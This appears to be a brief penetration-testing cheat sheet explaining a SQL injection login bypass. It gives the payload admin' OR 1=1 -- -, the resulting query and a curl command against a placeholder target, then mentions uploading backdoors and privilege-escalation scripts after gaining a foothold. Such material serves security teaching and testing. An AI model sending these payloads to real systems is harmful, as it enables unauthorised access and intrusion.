Inject SQL commands in the parameters to rewrite the SQL query.
SELECT * FROM user WHERE login='[USER]' and password='[PASSWORD]';
Method : close the single quote ', whiden the SELECT with OR 1=1, add entries thanks to UNION, comment the end of the request with # or -- -
Sent parameters:
USER=admin' OR 1=1 -- -
PASSWORD=ferrari
Altered SQL request:
SELECT * FROM user WHERE login='admin' OR 1=1 -- - and password='ferrari';
Send the Form with custom params thanks to curl:
curl http://target/login.pgp?login=admin' OR 1=1 -- -&password=ferrari
As soon as you get your initial foothold on the target server, your next step is to transfert text or binary files.
You'll probably download some target files and upload some tools such as backdoors or privilege escalation scripts...